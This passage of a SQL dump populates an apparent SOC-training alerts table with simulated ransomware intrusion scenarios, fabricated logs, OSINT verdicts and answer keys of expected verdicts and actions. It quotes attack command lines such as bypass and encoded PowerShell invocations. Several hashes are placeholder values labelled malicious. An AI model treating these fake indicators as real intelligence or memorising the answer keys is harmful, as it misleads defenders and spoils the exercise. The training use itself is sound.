4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:58Z\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scanned_ports\\\":[22,80,443],\\\"user\\\":\\\"compromised_user\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"network_scan_tool.exe\\\",\\\"event_id\\\":\\\"ID34567\\\",\\\"severity\\\":\\\"medium\\\",\\\"action\\\":\\\"scan detected\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1556, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) Logs', 'As the final step, the attackers exfiltrate student records and other sensitive data, threatening to leak the information unless a ransom is paid.', 'Exfiltration', 'T1048', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:28:32Z\",\"event_id\":\"DLP-2345\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.75\",\"user\":\"jdoe\",\"filename\":\"student_records_2023.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"exfiltration\",\"protocol\":\"HTTPS\",\"external_ip\":\"203.0.113.75\",\"message\":\"Sensitive data exfiltrated to external IP via secure channel.\",\"alert\":true}', '2026-03-15 19:12:42', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration destination\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"student_records_2023.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal system\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive student data\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious exfiltration file\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal system\",\"verdict\":\"suspicious\",\"details\":\"User involved in suspicious activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.488Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:28:32Z\\\",\\\"event_id\\\":\\\"DLP-2345\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.75\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"student_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"external_ip\\\":\\\"203.0.113.75\\\",\\\"message\\\":\\\"Sensitive data exfiltrated to external IP via secure channel.\\\",\\\"alert\\\":true}\"},{\"timestamp\":\"2026-03-15T20:57:15.488Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:28:32Z\\\",\\\"event_id\\\":\\\"DLP-2345\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.75\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"student_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"external_ip\\\":\\\"203.0.113.75\\\",\\\"message\\\":\\\"Sensitive data exfiltrated to external IP via secure channel.\\\",\\\"alert\\\":true}\"},{\"timestamp\":\"2026-03-15T20:56:15.488Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:28:32Z\\\",\\\"event_id\\\":\\\"DLP-2345\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.75\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"student_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"external_ip\\\":\\\"203.0.113.75\\\",\\\"message\\\":\\\"Sensitive data exfiltrated to external IP via secure channel.\\\",\\\"alert\\\":true}\"},{\"timestamp\":\"2026-03-15T20:55:15.488Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:28:32Z\\\",\\\"event_id\\\":\\\"DLP-2345\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.75\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"student_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"external_ip\\\":\\\"203.0.113.75\\\",\\\"message\\\":\\\"Sensitive data exfiltrated to external IP via secure channel.\\\",\\\"alert\\\":true}\"},{\"timestamp\":\"2026-03-15T20:54:15.488Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:28:32Z\\\",\\\"event_id\\\":\\\"DLP-2345\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.75\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"student_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"external_ip\\\":\\\"203.0.113.75\\\",\\\"message\\\":\\\"Sensitive data exfiltrated to external IP via secure channel.\\\",\\\"alert\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1557, 'Suspicious Phishing Email Detected', 'high', 'Email gateway logs', 'An incoming email has been detected with characteristics typical of a phishing attempt. The email contains a malicious attachment, commonly associated with Hive ransomware actors, aiming to gain initial access to the network.', 'Initial Access', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"email_id\":\"2345abcde6789fghijk\",\"sender_email\":\"malicious_actor@example.com\",\"recipient_email\":\"john.doe@victimcompany.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":\"Invoice_2023Q4.xlsm\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"sender_ip\":\"203.0.113.5\",\"recipient_ip\":\"192.168.1.25\",\"headers\":{\"X-Mailer\":\"Microsoft Outlook\",\"X-Phishing-Score\":\"9.8\",\"X-AntiSpam-Result\":\"Suspected\"}}', '2026-03-15 19:13:09', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"malicious_actor@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing email address associated with multiple campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to C2 infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious macro-enabled Excel file.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-03-15T20:58:15.512Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1558, 'Execution of Malicious Payload', 'critical', 'Endpoint detection and response (EDR) logs', 'Following initial access, the malicious payload is executed on the compromised system, marking the transition from infiltration to active compromise.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-16T14:32:00Z\",\"event_id\":\"4625\",\"event_type\":\"process_creation\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\ransom.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"file_name\":\"ransom.exe\"}', '2026-03-15 19:13:09', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known ransomware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransom.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareAnalysis\",\"verdict\":\"malicious\",\"details\":\"File associated with ransomware execution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1559, 'Establishment of Persistent Backdoor', 'high', 'System registry and scheduled tasks analysis', 'An advanced persistence mechanism was detected on a host system. The attackers have modified the Windows registry to run a malicious executable upon system start and scheduled a task to ensure the persistent backdoor remains active. The executable is associated with known APT activity.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:18Z\",\"event_id\":7045,\"system\":{\"host\":\"host1234.corp.local\",\"ip_address\":\"192.168.1.25\",\"user\":\"SYSTEM\"},\"event\":{\"type\":\"Registry Modification\",\"action\":\"Key Added\",\"key_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"key_value\":\"C:\\\\Windows\\\\System32\\\\malicious.exe\"},\"scheduled_task\":{\"name\":\"UpdateTask\",\"action\":\"Create\",\"command\":\"C:\\\\Windows\\\\System32\\\\malicious.exe\",\"trigger\":\"Daily\"},\"network\":{\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\"},\"file\":{\"path\":\"C:\\\\Windows\\\\System32\\\\malicious.exe\",\"hash\":\"3f7854a9b2e774b6c7f4b8b7a9d3e9f0\"}}', '2026-03-15 19:13:09', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT command and control servers.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f7854a9b2e774b6c7f4b8b7a9d3e9f0\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used for persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Executable file used for establishing persistence.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.531Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:18Z\\\",\\\"event_id\\\":7045,\\\"system\\\":{\\\"host\\\":\\\"host1234.corp.local\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"SYSTEM\\\"},\\\"event\\\":{\\\"type\\\":\\\"Registry Modification\\\",\\\"action\\\":\\\"Key Added\\\",\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"key_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"UpdateTask\\\",\\\"action\\\":\\\"Create\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Daily\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"3f7854a9b2e774b6c7f4b8b7a9d3e9f0\\\"}}\"},{\"timestamp\":\"2026-03-15T20:57:15.531Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:18Z\\\",\\\"event_id\\\":7045,\\\"system\\\":{\\\"host\\\":\\\"host1234.corp.local\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"SYSTEM\\\"},\\\"event\\\":{\\\"type\\\":\\\"Registry Modification\\\",\\\"action\\\":\\\"Key Added\\\",\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"key_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"UpdateTask\\\",\\\"action\\\":\\\"Create\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Daily\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"3f7854a9b2e774b6c7f4b8b7a9d3e9f0\\\"}}\"},{\"timestamp\":\"2026-03-15T20:56:15.531Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:18Z\\\",\\\"event_id\\\":7045,\\\"system\\\":{\\\"host\\\":\\\"host1234.corp.local\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"SYSTEM\\\"},\\\"event\\\":{\\\"type\\\":\\\"Registry Modification\\\",\\\"action\\\":\\\"Key Added\\\",\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"key_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"UpdateTask\\\",\\\"action\\\":\\\"Create\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Daily\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"3f7854a9b2e774b6c7f4b8b7a9d3e9f0\\\"}}\"},{\"timestamp\":\"2026-03-15T20:55:15.531Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:18Z\\\",\\\"event_id\\\":7045,\\\"system\\\":{\\\"host\\\":\\\"host1234.corp.local\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"SYSTEM\\\"},\\\"event\\\":{\\\"type\\\":\\\"Registry Modification\\\",\\\"action\\\":\\\"Key Added\\\",\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"key_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"UpdateTask\\\",\\\"action\\\":\\\"Create\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Daily\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"3f7854a9b2e774b6c7f4b8b7a9d3e9f0\\\"}}\"},{\"timestamp\":\"2026-03-15T20:54:15.531Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:18Z\\\",\\\"event_id\\\":7045,\\\"system\\\":{\\\"host\\\":\\\"host1234.corp.local\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"SYSTEM\\\"},\\\"event\\\":{\\\"type\\\":\\\"Registry Modification\\\",\\\"action\\\":\\\"Key Added\\\",\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"key_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"UpdateTask\\\",\\\"action\\\":\\\"Create\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Daily\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"3f7854a9b2e774b6c7f4b8b7a9d3e9f0\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1560, 'Lateral Movement Detected Across Network', 'high', 'Network traffic analysis', 'Anomalous lateral movement detected from compromised host attempting to connect to multiple internal systems, indicating potential spread of malicious software.', 'Lateral Movement', 'T1570 - Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T11:32:45Z\",\"source_ip\":\"192.168.1.10\",\"destination_ips\":[\"10.0.0.25\",\"10.0.0.30\"],\"external_attacker_ip\":\"203.0.113.45\",\"command\":\"smbclient\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"internal_user1\",\"filename\":\"payload.dll\",\"event_id\":\"4624\",\"event_type\":\"Network Connection\",\"protocol\":\"SMB\"}', '2026-03-15 19:13:09', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Compromised internal host attempting lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP linked to APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"payload.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"file analysis\",\"verdict\":\"malicious\",\"details\":\"Payload used for lateral movement and execution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1561, 'Data Exfiltration Attempt Identified', 'critical', 'Data loss prevention (DLP) systems', 'An advanced data exfiltration attempt was detected, involving the transfer of sensitive files to an external IP address. This is part of a known tactic used by Hive actors to conduct double extortion by leveraging stolen data.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:55Z\",\"event_id\":\"DLP-EXFIL-2023-0005\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"file_name\":\"financial_report_q3_2023.xlsx\",\"file_hash\":\"5e884898da28047151d0e56f8dc6292773603d0d6aabbddf\",\"user\":\"john_doe\",\"action\":\"allowed\",\"rule_triggered\":\"Sensitive Data Transfer\",\"alert_severity\":\"Critical\"}', '2026-03-15 19:13:09', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5e884898da28047151d0e56f8dc6292773603d0d6aabbddf\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash linked to potential data exfiltration malware.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Active directory user account.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP Logs\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive financial data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.538Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:55Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"5e884898da28047151d0e56f8dc6292773603d0d6aabbddf\\\",\\\"user\\\":\\\"john_doe\\\",\\\"action\\\":\\\"allowed\\\",\\\"rule_triggered\\\":\\\"Sensitive Data Transfer\\\",\\\"alert_severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.538Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 